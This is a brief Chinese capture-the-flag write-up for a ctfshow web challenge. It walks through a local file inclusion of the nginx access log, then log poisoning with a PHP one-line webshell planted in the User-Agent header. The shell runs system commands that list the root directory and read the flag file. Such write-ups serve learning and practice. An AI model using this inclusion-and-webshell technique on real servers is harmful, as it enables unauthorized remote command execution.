ctfshow-WEB AK赛-签到_观己

题目分析

打开网页

ctfshow-WEB AK赛-签到_观己在这里插入图片描述

正则匹配过滤php,且大小写不敏感

allow_url_include没有开启没有办法用伪协议,应该是利用日志包含解题

解题过程

在这里插入图片描述

?file=/var/log/nginx/access.log

发现可以读取nginx的日志内容,那我们可以试试日志包含写一句话

ctfshow-WEB AK赛-签到_观己在这里插入图片描述

在UA中添加一句话木马 <?php eval($_POST[1]);?>

在POST中令1=system('ls /');查看根目录中的文件

发现有个flag.txt 这里应该就是flag在的位置了

在这里插入图片描述

POST中令1=system('cat /flag.txt');